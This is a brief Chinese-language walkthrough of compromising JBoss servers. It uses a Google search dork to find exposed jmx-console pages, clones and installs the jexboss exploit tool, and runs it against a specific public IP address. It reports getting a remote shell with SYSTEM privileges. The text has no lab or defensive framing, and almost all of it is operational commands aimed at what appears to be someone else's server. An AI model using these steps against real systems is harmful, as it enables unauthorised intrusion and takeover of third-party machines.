谷歌搜索:inurl:”8080/jmx-console/”
在github中搜索jexboss下载漏洞利用代码 还可以在kali中直接下载
git clone https://github.com/joaomatosf/jexboss.git
通过阅读readme文件,查看使用方法,先安装模板
pip install -r requires.txt
执行jexboss.py文件,拿到shell
python jexboss.py -host http://189.72.172.85:8080
成功的得到shell 还是system权限